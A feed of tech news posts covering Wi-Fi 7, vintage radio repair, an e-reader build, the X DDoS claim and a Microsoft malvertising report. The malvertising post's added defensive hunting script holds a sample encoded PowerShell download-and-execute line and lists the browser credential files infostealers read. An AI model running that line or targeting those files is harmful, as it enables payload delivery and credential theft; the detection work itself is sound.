This isn’t the first time we’ve seen the Raspberry Pi used as an electronic traffic cop, but it’s undoubtedly the most polished version of the concept we’ve come across. You might consider passive radar, too.


hackaday.com/2025/03/11/homebr…


Inside IEEE 802.11 Wireless Networks: Architecture and the Wi-Fi Signal


IEEE 802.11 wireless networks, better known as Wi-Fi, are the beating heart of modern connectivity. From a niche solution for home use to a technological pillar for the Internet of Things (IoT), smart cities and enterprise infrastructure, Wi-Fi has evolved into something unstoppable. Today, in 2025, the arrival of Wi-Fi 7 (IEEE 802.11be) brings theoretical speeds above 46 Gb/s and sub-millisecond latency, but with it new challenges emerge: security, interference and spectrum management.

In this article, part of Red Hot Cyber’s Wi-Fi column, we analyze the fundamentals of IEEE 802.11 networks, exploring their architecture, how the signal works, their advantages and their limits. The aim is to understand not only the potential of Wi-Fi 7 but also the emerging challenges, particularly those related to cybersecurity and spectrum management.

Why Wi-Fi Dominates (and Where It Stumbles)


Imagine a world without Wi-Fi: no connected smartphones, no smart homes, no offices free of tangled cables. Wi-Fi conquered the planet thanks to four strengths:

  • Pure mobility: you move, you stay connected. From robotized warehouses to university campuses, it’s a game-changer.
  • Lower costs: no cabling means quick installations and savings of 30-40% compared to Ethernet [1]. Perfect for historic buildings or temporary structures.
  • Screaming speeds: with Wi-Fi 7, Multi-Link Operation (MLO) uses the 2.4, 5 and 6 GHz bands simultaneously, pushing throughput to levels never seen before.
  • Extreme flexibility: from a home LAN to a company with thousands of devices, Wi-Fi adapts.

But not all that glitters is gold. Transmission over radio waves makes it vulnerable: an attacker with a directional antenna can intercept signals from a distance, and even WPA3 is not immune to sophisticated exploits. Then there is interference – microwave ovens and Bluetooth congest the 2.4 GHz band, while 6 GHz requires advanced strategies to avoid overlap. Finally, range: regulations such as ETSI’s (20-30 dBm) limit coverage to 100-200 meters outdoors, and indoors a concrete wall can halve it.

How It Works: the Wi-Fi Architecture


Wi-Fi rests on a cell-based architecture, the Service Sets, which define how devices talk to each other:

IBSS (Ad Hoc): Direct Communication Between Devices

In an IBSS (Independent Basic Service Set) network there is no Access Point (AP): devices connect directly to each other. This scheme, also known as Ad Hoc mode, is useful for emergency scenarios or temporary networks.

Example: industrial sensors in a factory or at a remote drilling site can use IBSS to exchange data directly, without needing a complex network architecture.

  • Scenario: Un sistema di monitoraggio di gas tossici in una miniera o raffineria, in cui i sensori devono condividere letture in tempo reale con una centralina mobile senza un’infrastruttura fissa.

Funzionamento: I sensori si collegano in modalità Ad Hoc, trasmettendo informazioni critiche tra loro per generare un’allerta locale in caso di pericolo.

BSS: networks with a centralised Access Point (AP)


In a Basic Service Set (BSS) an AP acts as coordinator, managing the Wi-Fi clients and optimising communication. This is the standard model for home and enterprise environments.

Example: a Wi-Fi 6 network for a small office, with a single AP that uses OFDMA (Orthogonal Frequency-Division Multiple Access) and MU-MIMO to serve several clients at once, assigning portions of the spectrum more efficiently.

ESS: extended coverage with seamless roaming


An Extended Service Set (ESS) links several BSSs through a Distribution System (DS), usually Ethernet or a wireless backhaul. It is the model used to provide uninterrupted coverage over large areas.

Examples:

  • In a hospital that needs fast handoff, the APs use 802.11r (Fast BSS Transition) so that clients move from one AP to the next without repeating a full authentication: the pairwise keys are derived from a cached key hierarchy rather than from a fresh 802.1X exchange.
  • In industrial environments with AGVs (Automated Guided Vehicles), Wi-Fi must roam without perceptible latency. 802.11k (neighbour reports) and 802.11v (BSS transition management) tell a device in advance which AP is the best one to join, cutting transition time.

In 2025, Wi-Fi 7 raises the bar: MLO lets a device use several bands in parallel, reducing latency and increasing reliability. The result? A device can shift from 2.4 GHz (long range) to 6 GHz (high capacity) without you noticing. Add 320 MHz channels and uplink/downlink MU-MIMO, and you have a network that handles 50 devices in a single room without blinking.

Having seen how the Wi-Fi architecture uses IBSS, BSS and ESS to provide connectivity and continuous roaming, the natural question is: what physically happens to the signal as we move from one Access Point to another?

The Wi-Fi Signal: Physics at Work


Wi-Fi is not just software and networking: it is electromagnetic waves that must cover distance and pass obstacles to connect devices. It operates in the 2.4 GHz ISM band and in the 5 GHz and 6 GHz U-NII bands, and its propagation is governed by precise physical laws. Frequency dictates everything: at 2.4 GHz the wavelength is 12.5 cm, well suited to passing through walls; at 6 GHz it drops to 5 cm, ideal for speed but fragile against obstacles.

In free space the received power falls with distance according to the inverse-square law (the Friis equation with isotropic antennas, where $\lambda$ is the wavelength and $R$ the distance):

$$P_r = P_t \left(\frac{\lambda}{4\pi R}\right)^2$$

Add absorption (10-15 dB for a concrete wall) and reflections, and you understand why the signal fades out at 50 metres indoors. But there are tricks: beamforming focuses the waves like a spotlight, and OFDM splits the data across sub-carriers to dodge interference. Wi-Fi 7 pushes further with 4096-QAM, which packs 12 bits into each symbol instead of the 10 bits of Wi-Fi 6's 1024-QAM, a 20% throughput gain at the same channel width.
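To make the numbers above concrete, here is an added example (not code from the original article) that applies the Friis equation in decibel form and then subtracts per-wall absorption to get a link budget. The transmit power (20 dBm EIRP), receiver sensitivity (-70 dBm) and wall loss (12 dB) are assumed values chosen for illustration; `max_range_m` inverts the formula to give the distance at which the received power reaches the sensitivity.

```python
"""Free-space path loss and a simple indoor link budget for the Wi-Fi bands.

Added example, not code from the original article. It applies the Friis
equation with isotropic antennas, P_r = P_t * (lambda / (4*pi*R))**2, in its
decibel form, then subtracts the per-wall absorption the text mentions.
Transmit power (20 dBm EIRP), receiver sensitivity (-70 dBm) and the 12 dB
concrete-wall loss are assumed values for illustration.
"""
import math

C = 299_792_458.0  # speed of light in m/s


def wavelength_m(freq_hz: float) -> float:
    """lambda = c / f: ~0.125 m at 2.4 GHz, ~0.05 m at 6 GHz."""
    return C / freq_hz


def fspl_db(freq_hz: float, distance_m: float) -> float:
    """Free-space path loss in dB, i.e. -10*log10((lambda/(4*pi*R))**2)."""
    return 20.0 * math.log10(4.0 * math.pi * distance_m / wavelength_m(freq_hz))


def received_dbm(tx_dbm: float, freq_hz: float, distance_m: float,
                 walls_db=()) -> float:
    """Received power: EIRP minus free-space loss minus each wall's absorption."""
    return tx_dbm - fspl_db(freq_hz, distance_m) - sum(walls_db)


def max_range_m(tx_dbm: float, freq_hz: float, sensitivity_dbm: float = -70.0,
                walls_db=()) -> float:
    """Invert Friis: the distance at which received power drops to the sensitivity."""
    budget_db = tx_dbm - sensitivity_dbm - sum(walls_db)
    return wavelength_m(freq_hz) / (4.0 * math.pi) * 10 ** (budget_db / 20.0)


def link_ok(rx_dbm: float, sensitivity_dbm: float = -70.0) -> bool:
    """True when the receiver still has enough signal to decode."""
    return rx_dbm >= sensitivity_dbm


if __name__ == "__main__":
    TX_DBM = 20.0             # assumed: ETSI-style 20 dBm EIRP
    CONCRETE_WALL_DB = 12.0   # inside the 10-15 dB range quoted in the text
    for label, f in (("2.4 GHz", 2.4e9), ("5 GHz", 5.0e9), ("6 GHz", 6.0e9)):
        open_air = max_range_m(TX_DBM, f)
        two_walls = max_range_m(TX_DBM, f, walls_db=(CONCRETE_WALL_DB, CONCRETE_WALL_DB))
        print(f"{label}: FSPL@10m={fspl_db(f, 10.0):.1f} dB, "
              f"range open={open_air:.0f} m, behind two walls={two_walls:.0f} m")
```

Running it shows the two effects the text describes: moving from 2.4 GHz to 6 GHz costs about 8 dB of path loss at the same distance (20·log10(6/2.4)), and two concrete walls knock the usable range down by more than an order of magnitude, which is why 6 GHz deployments need a denser grid of APs.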

Wi-Fi 7: the Future Is Now


In 2025, Wi-Fi 7 is the new reference standard, taking wireless connectivity to levels never seen before:

  • 320 MHz channels: twice the width of Wi-Fi 6, a data highway.
  • MLO: real-time multi-band operation, with latency that is claimed to fall below 1 ms.
  • 6 GHz: clean spectrum, but it needs a denser AP deployment to cover the same area.

The result? You can stream 8K, manage an army of IoT devices and work remotely without lag. But there is a price: more APs means more cost, and security must keep pace with increasingly sophisticated threats.

Security Challenges and Outlook


Wi-Fi is powerful, but also vulnerable if not properly protected. WPA3 is a step forward, but threats persist:

  • Deauthentication flood attacks, which forcibly disconnect devices. Protected Management Frames (802.11w), mandatory in WPA3, blunt them, but only if every client on the network supports them.
  • Exploitation of chipset vulnerabilities, as demonstrated by the FragAttacks (2021).
  • Exponential IoT growth: every connected device is a potential weak point in the network.

MLO helps spread traffic and reduce risk, but without adequate encryption and segmentation a compromised Access Point can become a Trojan horse. Moreover, the spread of the 6 GHz band will bring higher device density, making AI-based algorithms necessary for dynamic interference management and real-time channel optimisation.
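The deauthentication flood in the list above is easy to spot from a monitor-mode capture once you parse the 802.11 management header. The following is an added example (not code from the original article): it builds a few constructed deauth frames, parses the 24-byte MAC header, and applies three checks a wireless IDS sensor can run: a burst of deauth/disassoc frames for one BSSID inside a short window, deauths addressed to the broadcast MAC, and unprotected deauths against a BSS known to require Protected Management Frames (802.11w), which a genuine AP would never send. The MAC addresses, threshold and window are assumed values.

```python
"""Detecting a deauthentication flood from raw 802.11 management frames.

Added example, not code from the original article. Frame layout follows
IEEE 802.11: Frame Control (2 bytes), Duration (2), Address 1-3 (6 each),
Sequence Control (2), then for deauth/disassoc a 2-byte reason code.
All addresses, the threshold and the window are assumed for illustration.
"""
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
TYPE_MGMT = 0
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 0x0A, 0x0C
FC1_PROTECTED = 0x40            # "Protected Frame" bit in Frame Control byte 1
HDR = "<BBH6s6s6sH"             # FC0, FC1, duration, addr1, addr2, addr3, seq ctl
HDR_LEN = struct.calcsize(HDR)  # 24 bytes


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_deauth(addr1, addr2, bssid, seq, reason=7, protected=False,
                 subtype=SUBTYPE_DEAUTH) -> bytes:
    """Constructed management frame: header plus the 2-byte reason code body."""
    fc0 = (subtype << 4) | (TYPE_MGMT << 2)   # protocol version 0, type 0, subtype
    fc1 = FC1_PROTECTED if protected else 0
    hdr = struct.pack(HDR, fc0, fc1, 0x013A, mac_bytes(addr1), mac_bytes(addr2),
                      mac_bytes(bssid), seq << 4)
    return hdr + struct.pack("<H", reason)


def parse_frame(raw: bytes) -> dict:
    fc0, fc1, _dur, a1, a2, a3, seqctl = struct.unpack_from(HDR, raw, 0)
    reason = struct.unpack_from("<H", raw, HDR_LEN)[0] if len(raw) >= HDR_LEN + 2 else None
    return {"type": (fc0 >> 2) & 0x3, "subtype": fc0 >> 4,
            "protected": bool(fc1 & FC1_PROTECTED),
            "addr1": mac_str(a1), "addr2": mac_str(a2), "bssid": mac_str(a3),
            "seq": seqctl >> 4, "reason": reason}


def detect_deauth_flood(frames, window_s=1.0, threshold=10, pmf_bssids=frozenset()):
    """frames: iterable of (timestamp_s, raw_frame). Returns (kind, bssid, ts) alerts."""
    alerts = []
    recent = defaultdict(deque)   # bssid -> timestamps of recent deauth/disassoc
    for ts, raw in frames:
        f = parse_frame(raw)
        if f["type"] != TYPE_MGMT or f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        if f["bssid"] in pmf_bssids and not f["protected"]:
            alerts.append(("unprotected_deauth_on_pmf_bss", f["bssid"], ts))
        if f["addr1"] == BROADCAST:
            alerts.append(("broadcast_deauth", f["bssid"], ts))
        q = recent[f["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) == threshold:   # fires once, when the burst crosses the threshold
            alerts.append(("deauth_flood", f["bssid"], ts))
    return alerts


def sample_capture():
    """Constructed trace: 3 genuine protected deauths, then a 50-frame spoofed broadcast flood."""
    ap, client = "aa:bb:cc:dd:ee:01", "11:22:33:44:55:66"
    frames = [(i * 5.0, build_deauth(client, ap, ap, seq=100 + i, reason=3, protected=True))
              for i in range(3)]
    frames += [(20.0 + i * 0.01, build_deauth(BROADCAST, ap, ap, seq=i, reason=7))
               for i in range(50)]
    return frames


if __name__ == "__main__":
    for kind, bssid, ts in detect_deauth_flood(sample_capture(), pmf_bssids={"aa:bb:cc:dd:ee:01"}):
        if kind == "deauth_flood":
            print(f"t={ts:.2f}s: deauth flood against {bssid}")
```

The PMF check is the decisive one: on a WPA3 network every real deauth carries the Protected Frame bit, so an unprotected one with the AP's BSSID can only be forged. The rate and broadcast checks still matter for the legacy WPA2 clients that cannot use 802.11w.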

Conclusion: a Precarious Balance


The IEEE 802.11 protocol is an engineering masterpiece that has made Wi-Fi synonymous with speed, flexibility and ubiquity. With Wi-Fi 7, connectivity enters a new era, but not without compromises:

  • Security and cyber threats remain a constant challenge.
  • Interference and spectrum management will require intelligent solutions.
  • Cost and scalability could slow adoption in some environments.

For those working in cybersecurity and network management the message is clear: design with foresight, protect every layer, and prepare for a world that is ever more wireless, and ever more exposed to risk.

Follow our Wi-Fi column to stay up to date!

References:

[1] IEEE (2024). Wi-Fi 7 Technical Overview.

[2] Higher Order Feature Extraction and Selection for Robust Human Gesture Recognition using CSI of COTS Wi-Fi Devices. mdpi.com/1424-8220/19/13/2959

The article Inside IEEE 802.11 Wireless Networks: Architecture and the Wi-Fi Signal comes from il blog della sicurezza informatica.


Hacking a Heavyweight Philco Radio


Red and gold bakelite Philco farm radio on a workbench

There’s something magical about the clunk of a heavy 1950s portable radio – the solid thunk of Bakelite, the warm hum of tubes glowing to life. This is exactly why [Ken’s Lab] took on the restoration of a Philco 52-664, a portable AC/DC radio originally sold for $45 in 1953 (a small fortune back then!). Despite its beat-up exterior and faulty guts, [Ken] methodically restored it to working condition. His video details every crackling capacitor and crusty resistor he replaced, and it’s pure catnip for any hacker with a soft spot for analog tech. Does the name Philco ring a bell? We recently covered the restoration of a 1958 Philco Predicta television.

What sets this radio hack apart? To begin with, [Ken] kept the restoration authentic, repurposing original capacitor cans and using era-appropriate materials – right down to boiling out old electrolytics in his wife’s discarded cooking pot. But, he went further. Lacking the space for modern components, [Ken] fabbed up a custom mounting solution from stiff styrofoam, fibreboard, and all-purpose glue. He even re-routed the B-wiring with creative terminal hacks. It’s a masterclass in patience, precision, and resourcefulness.

If this tickles your inner tinkerer, don’t miss out on the full video. It’s like stepping into a time machine.

youtube.com/embed/TimWXHoAfss?…


hackaday.com/2025/03/10/hackin…


Satellite Imagery You Can Play With


Satellite imagery is in the news right now, but not all satellite constellations are the preserve of governments. Satellogic operates a series of CubeSats with Earth imaging payloads, and best of all, they maintain an open dataset. [Mark Litwintschik] takes us through using it.

Starting with a script to recover the locations of the satellites, he moves on to the data itself. It’s in a huge S3 bucket, for which parsing the metadata becomes a big data question rather than one of simple retrieval. After parsing he loads the resulting data into a database, from which he can then perform queries more easily. He uses Qatar as his example, and shows us the resulting imagery.

The dataset isn’t comprehensive, it’s obvious that the areas surveyed have been done at the behest of customers. But who knows, your part of the world might be one of the areas in the dataset, and now you have all the tools you need to explore. It certainly beats low-res weather satellite imagery.


hackaday.com/2025/03/10/satell…


What’s Wrong With This Antenna Tuner?


[Tech Minds] built one of those cheap automatic antenna tuners you see everywhere — this one scaled up to 350 watt capability. The kit is mostly built, but you do have to add the connectors and a few other stray bits. You can see how he did it in the video below.

What was very interesting, however, was that it wasn’t able to do a very good job tuning a wire antenna across the ham bands, and he asks for your help on what he should try to make things better.

It did seem to work in some cases, and changing the length of the wire changed the results, so we would guess some of it might be resonance on the antenna wire. Still, you would think it could do a little better. It is well known that if a wire is one of a number of certain lengths, it will have extremely high impedance on multiple ham bands and be challenging to tune. So random wires need to not be exactly random: you have to avoid those lengths.

In addition, we were surprised there wasn’t more RF protection on the power lines. We would probably have suggested winding some coax to act as a shield choke, RF beads, and even extra bypass capacitors.

Another possible problem is that the diodes in these units are often not the best. [PU1OWL] talks about that in another video and bypasses some of the power lines against RF, too.

If you have any advice, we are sure he’d love to hear it. As [PU1OWL] points out, a tuner like this can’t be any better than its SWR measurement mechanism. Of course, all of these tuners take a few watts to light them up. You can, however, tune with virtually no power with a VNA.

youtube.com/embed/L8VH30MwNEU?…


hackaday.com/2025/03/10/whats-…


Solar-Powered E-Reader With No Buttons


Modern e-readers such as the Amazon Kindle are incredible pieces of engineering, but that doesn’t mean there’s no room for improvement. A device custom-built to your own specifications is always going to provide a more satisfying experience than something purchased off the shelf. That’s why [fel88] put together this custom e-reader which offers a number of unique features, such as a solar panel on the back and button-free operation.

One issue with modern e-readers, at least as [fel88] sees it, is that they have a lot of unnecessary features. This project removes most of them, stripping down the device to its core functionality: a straightforward menu for selecting books and gesture-sensing for navigating the menu as well as changing the pages. The only physical input on the device is a small reed switch to turn the device on. A 3D printed case holds the e-ink display and encloses the inner workings, driven by an Arduino Mega 2560 and powered by three lithium-ion capacitors (LICs) and a small solar panel.

By dropping all of the unnecessary features, the device doesn’t need to waste energy with things like WiFi or Bluetooth and can get around 880 pages on a single charge, not counting any extra energy coming in through the solar panel while it’s operating. The LICs will also theoretically improve its life cycle as well. If you’re still stuck with a paperweight when you formerly had a working e-reader, though, there are plenty of ways to bring old devices back to life as well.


hackaday.com/2025/03/10/solar-…


Freeing Windows


There have been several attempts to make an unencumbered version of Windows. ReactOS is perhaps the best-known, although you could argue Wine and its progeny, while not operating systems in the strictest sense of the word, might be the most successful. Joining the fray is Free95, a GPL-3.0 system that, currently, can run simple Windows programs. The developer promises to push to even higher compatibility.

As you might expect, the GitHub site is calling for contributors. There will be a lot to do. The src subdirectory has a number of files, but when you consider the sheer volume of stuff crammed into Windows, it is just a minimal start.

As for the “Does it run Doom?” test, we are pretty sure the answer is no, not yet. While we applaud the effort, we do think it is a long road to get from where the project is to where even ReactOS is, much less Windows itself. Besides, Windows is a rapidly moving target.

As virtualization becomes easier and faster, the need for these programs diminishes. You can easily run a Windows OS inside your host operating system. If it outperforms the original on period hardware, maybe that’s good enough. On the other hand, if you are trying to run old hardware, maybe something like this will let you get a few more years out of it, one day.

We’ve looked at ReactOS before. If you are just looking to reduce bloat, there are other ways to go.


hackaday.com/2025/03/10/freein…


X Goes Offline After a DDoS Attack by Dark Storm. Elon Musk: “A Large, Coordinated Group”


X, the social media platform formerly known as Twitter, was offline for a considerable time today. According to Downdetector.com, X first experienced widespread problems at around 5:40 ET on Monday.

Some users reported being unable to load posts on X, or receiving error messages such as “Something went wrong. Try reloading”.

X then resumed service late in the morning, but appeared to suffer further outages at around 10:00 ET, peaking at 40,000 problem reports, and again at 13:00 ET and then at 19:00 Italian local time.

The outages were reported globally.

Dark Storm Team’s claim


Meanwhile, the Dark Storm Team group claimed responsibility for a DDoS attack on X. The hackers formed as a pro-Palestinian collective in 2023 and are said to have targeted the government websites of NATO countries, of Israel and of nations that support Israel.

As our readers know, a DDoS (distributed denial-of-service) attack consists of suspicious traffic volumes or traffic spikes that slow down a website or service or make it unavailable. Flooding a target with bogus requests or connection attempts can make it unreachable for legitimate users.

In the Telegram post obtained by Red Hot Cyber, the collective claims responsibility for today’s DDoS attack on X. Dark Storm Team wrote that it had managed to “take Twitter offline” and shared a screenshot of a real-time connectivity status page showing failed connection attempts from several locations around the world.

The Dark Storm Team (DST) hacker group is said to have been created in September 2023, a few weeks before the Hamas terrorist attack of 7 October against Israel.

The group is said to be pro-Palestinian and to have possible links with Russia.

Elon Musk’s statements


“There was (still is) a massive cyberattack against X,” Musk wrote on Monday afternoon. “We get attacked every day, but this was done with a lot of resources. Either a large, coordinated group and/or a country is involved. Tracing…”

Musk is also the CEO of Tesla and SpaceX, as well as heading President Donald Trump’s DOGE (Department of Government Efficiency).

The article X Goes Offline After a DDoS Attack by Dark Storm. Elon Musk: “A Large, Coordinated Group” comes from il blog della sicurezza informatica.


Microsoft Reveals a Shock Attack: 1 Million PCs Infected by Malware Hidden in Ads


Microsoft has revealed that in recent months almost 1 million Windows devices were hit by a sophisticated malvertising campaign. Credentials, cryptocurrency and confidential information were stolen from the computers of infected users.

According to the researchers, the campaign began in December 2024, when unknown attackers started planting links through which advertisements were loaded. Microsoft says the sites hosting the ads were pirate streaming platforms carrying illegal content. The company’s report names two such domains: movies7[.]net and 0123movie[.]art.

“The streaming sites embedded malicious redirectors to generate revenue from pay-per-view or pay-per-click platforms,” the experts write.
Attack scheme
The malicious links, embedded via iframes, led victims through a chain of redirects, a series of intermediate sites (such as a fake tech-support site) and finally to GitHub repositories hosting a set of malicious files.

The malware was delivered in several stages. In the initial stages, information about the user’s device was collected, presumably to configure the later stages of the attack. In the later stages, malware-detection applications were disabled and a connection to the command-and-control servers was established, after which the NetSupport RAT (remote access tool) was installed on the system.

“Depending on the second-stage payload, one or more executables and sometimes an encoded PowerShell script were delivered to the infected device,” the researchers wrote. “These files triggered a chain of events that included command execution, payload delivery, defence evasion, persistence, command-and-control communication and data theft.”

GitHub was the main host for the payloads, but Discord and Dropbox were also used. The experts believe the campaign was opportunistic, in the sense that the attackers targeted everyone rather than specific people, organisations or sectors.

The malware that reached the victims’ systems (usually the Lumma and Doenerium infostealers) stole the following browser files, which may hold session cookies, passwords, history and other sensitive information:

  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite;
  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\formhistory.sqlite;
  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\key4.db;
  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\logins.json;
  • \AppData\Local\Google\Chrome\User Data\Default\Web Data;
  • \AppData\Local\Google\Chrome\User Data\Default\Login Data;
  • \AppData\Local\Microsoft\Edge\User Data\Default\Login Data.

The attackers were also interested in files stored in the Microsoft OneDrive cloud service, and the malware checked for cryptocurrency wallets (Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey and BitBox) on the victim’s computer.

According to Microsoft, the first-stage payloads were digitally signed, and the company has now identified and revoked 12 different certificates used in these attacks.
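The behaviours described in this report translate directly into hunting logic. The following is an added example, not Microsoft’s code or detection content: it runs three checks over constructed endpoint telemetry: an encoded PowerShell command line (decoded from base64 UTF-16LE), a script host reaching the file-hosting services named above as payload hosts, and a non-browser process reading the browser credential stores listed above. The event format, process names, paths and the GitHub URL in the sample are assumed for illustration and are not indicators from the report.

```python
"""Hunting for the malvertising chain's endpoint behaviour in sample telemetry.

Added example, not Microsoft's code. Three checks drawn from the report's
description: encoded PowerShell, script hosts fetching from the named
payload hosts, and non-browser processes reading browser credential stores.
Event format, process names, paths and URLs are constructed for illustration.
"""
import base64
import re
from collections import namedtuple

Event = namedtuple("Event", "ts kind process target")   # constructed format

CRED_STORE_DIRS = ("\\Mozilla\\Firefox\\Profiles\\",
                   "\\Google\\Chrome\\User Data\\",
                   "\\Microsoft\\Edge\\User Data\\")
CRED_STORE_FILES = ("cookies.sqlite", "formhistory.sqlite", "key4.db",
                    "logins.json", "Web Data", "Login Data")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
PAYLOAD_HOSTS = ("github.com", "raw.githubusercontent.com", "objects.githubusercontent.com",
                 "cdn.discordapp.com", "dl.dropboxusercontent.com")

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob
ENC_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_credential_store(path: str) -> bool:
    p = path.lower()
    return any(d.lower() in p for d in CRED_STORE_DIRS) and \
        any(p.endswith(f.lower()) for f in CRED_STORE_FILES)


def hunt(events):
    """Return (ts, finding, process, detail) tuples for the suspicious events."""
    findings = []
    for e in events:
        proc = e.process.lower()
        if e.kind == "process":
            decoded = decode_encoded_command(e.target)
            if decoded is not None:
                findings.append((e.ts, "encoded_powershell", proc, decoded))
        elif e.kind == "network":
            host = e.target.split(":")[0].lower()
            if proc in SCRIPT_HOSTS and host.endswith(PAYLOAD_HOSTS):
                findings.append((e.ts, "script_host_fetch_from_payload_host", proc, host))
        elif e.kind == "file" and proc not in BROWSERS and is_credential_store(e.target):
            findings.append((e.ts, "credential_store_read_by_non_browser", proc, e.target))
    return findings


def sample_events():
    """Constructed telemetry; the repository path in the URL is a placeholder."""
    stage2 = ("IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/placeholder/repo/stage2.ps1')")
    enc = base64.b64encode(stage2.encode("utf-16-le")).decode()
    return [
        Event("10:00:01", "process", "powershell.exe",
              f"powershell.exe -nop -w hidden -EncodedCommand {enc}"),
        Event("10:00:05", "network", "powershell.exe", "raw.githubusercontent.com:443"),
        Event("10:00:09", "file", "chrome.exe",
              r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
        Event("10:00:12", "file", "stage3.exe",
              r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
        Event("10:00:13", "file", "stage3.exe",
              r"C:\Users\u\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default-release\logins.json"),
        Event("10:00:20", "network", "msedge.exe", "github.com:443"),   # benign browsing
    ]


if __name__ == "__main__":
    for ts, kind, proc, detail in hunt(sample_events()):
        print(ts, kind, proc, str(detail)[:80])
```

The browser itself reading `Login Data` is normal and is deliberately not flagged; what matters is any other process touching those files, and that is the signal to pivot on when the encoded PowerShell and the fetch from a public file host appear in the same timeline.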

The article Microsoft Reveals a Shock Attack: 1 Million PCs Infected by Malware Hidden in Ads comes from il blog della sicurezza informatica.


Conservationists Are Flying Microlites To Teach Birds How To Migrate


When it comes to what birds have and what humans don’t, your mind might first land on the ability to fly. However, birds are also pretty good at navigating from the air… assuming, that is, they know where they’re trying to go in the first place.

In recent decades, conservationists have been trying to reintroduce the northern bald ibis to central Europe. There’s just one problem—when the birds first died out on the continent, so did their handed-down knowledge of their traditional migration route. Somehow, the new generation had to be taught where to go.

Flightpaths

The northern bald ibis was once widely found all over Europe, but disappeared several centuries ago. It had the most success clinging on in Morocco, which has been a source of birds for reintroduction efforts. Credit: Len Worthington, CC BY-SA 2.0
The population of the northern bald ibis used to be spread farther and wider than it is today. Fossil records indicate the bird once lived in great numbers across northern Africa, the Middle East, and southern and central Europe. Sadly, it vanished from Europe sometime in the 17th century, though it persisted elsewhere, most notably in Morocco. A wild population hung on in Turkey, though faced a rapid decline from the 1970s onwards, with birds failing to return from their winter migrations. In 1992, a handful of remaining birds were kept caged for part of the year to prevent these annual losses. Meanwhile, in 2002, it was revealed that a handful of birds were clinging on with isolated nests found in Syria. Numbers remain limited in the low four-figure range, with the northern bald ibis definitively listed as endangered.


With the bird’s status in danger, multiple reintroduction efforts have been pursued around the world. In particular, European efforts had boosted a conserved population up to 300 individuals by the early 2000s. However, keeping the birds alive proved challenging. Being unfamiliar with the continent, the birds would tend to fly off in random directions when their instinct kicked in to migrate for winter. Without knowing where they were going, few birds would make it to a suitably warm climate for the colder months, and many failed to return home in the summer.
The birds are kept in aviaries at times to ensure they are fit for migration and that they don’t head off in a random direction of their own accord. Credit: Baekemm, CC BY-SA 4.0
In 2002, an effort to solve this began in earnest. It hoped to not only return the birds to the wild, but to let them freely roam and migrate as they once did with abandon. The hope was to breed birds in captivity, and then train them on their traditional migration route, such that they might then pass the knowledge on to their descendants.

Of course, you can’t simply sit a northern bald ibis down with a map and show it how to get from northern Austria down to Tuscany and back. Nor can you train it on a flight simulator or give it a GPS. Instead, the conservationists figured they’d teach the birds the old fashioned way. They’d fly the route with a microlite aircraft, with the birds trained to follow along behind. Once they got the idea, the microlite would guide them on the longer migration route, and the hope was that they’d learn to repeat the journey themselves for the future.

The benefit of using an ultralight aircraft was simple. It allowed the birds to see their keepers and follow a familiar human in flight. In contrast, typical general aviation aircraft or larger planes wouldn’t be so familiar to the birds, and they wouldn’t be so eager to follow.

In 2003, the first migration attempt took place. The initial attempt faced challenges, with inclement weather forcing the birds to be transported much of the way by road. However, the following year found great success. The birds were guided south during the autumn, and returned the following spring. The project continued, with repeat successes over the years. Reports from 2010 were particularly buoyant. Across August and September that autumn, the journey saw 14 birds following the microlites for an average distance of 174 km a day, winding up in Tuscany in time for the winter.

youtube.com/embed/3kE83VIZZO0?…

The project continues in earnest to this day. “We have to teach them the migration route and that’s what we do using microlight planes,” project director Johannes Fritz told AP. Leading the Waldrappteam, he’s been working for decades to train the birds on what used to come naturally. “Human foster parents raise the chicks so they are imprinted on human foster parents, and then we train them to follow the foster parents which sit on the back seat of the microlight—and it works.” The training is taking, with the team recording multiple birds independently deciding to fly the correct migration route over the years.

The hope is that the flock will grow larger and eventually become self-sustaining. Ideally, the older birds that know the route will teach younger generations, just as they learned themselves from the microlite pilots in their youth. It’s a grand tradition, passed down from pilot to bird to bird, perhaps not quite as nature intended!

Featured image: “Migration 2023 Laura Pehnke” Copyright: Waldrappteam Conservation & Research


hackaday.com/2025/03/10/conser…


The ESP32 Bluetooth Backdoor That Wasn’t


Recently there was a panicked scrambling after the announcement by [Tarlogic] of a ‘backdoor’ found in Espressif’s popular ESP32 MCUs. Specifically a backdoor on the Bluetooth side that would give a lot of control over the system to any attacker. As [Xeno Kovah] explains, much about these claims is exaggerated, and calling it a ‘backdoor’ is far beyond the scope of what was actually discovered.

To summarize the original findings, the researchers found a number of vendor-specific commands (VSCs) in the (publicly available) ESP32 ROM that can be sent over the host-controller interface (HCI) between the host software and the Bluetooth controller. They found that these VSCs could do things like read and write the controller’s memory, firmware included, as well as send low-level packets.

The thing about VSCs is of course that these are a standard feature with Bluetooth controllers, with each manufacturer implementing a range of these for use with their own software SDK. These VSCs allow for updating firmware, report temperatures and features like debugging, and are generally documented (except for Broadcom).

